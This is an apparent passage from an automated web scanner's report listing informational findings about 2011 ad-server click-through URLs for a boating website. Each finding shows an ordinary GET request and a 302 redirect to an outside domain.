20.464. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.465. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.466. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.467. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.468. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.469. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.470. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.471. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.472. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:38:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.473. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.474. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.475. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:23:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.476. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.477. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.478. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
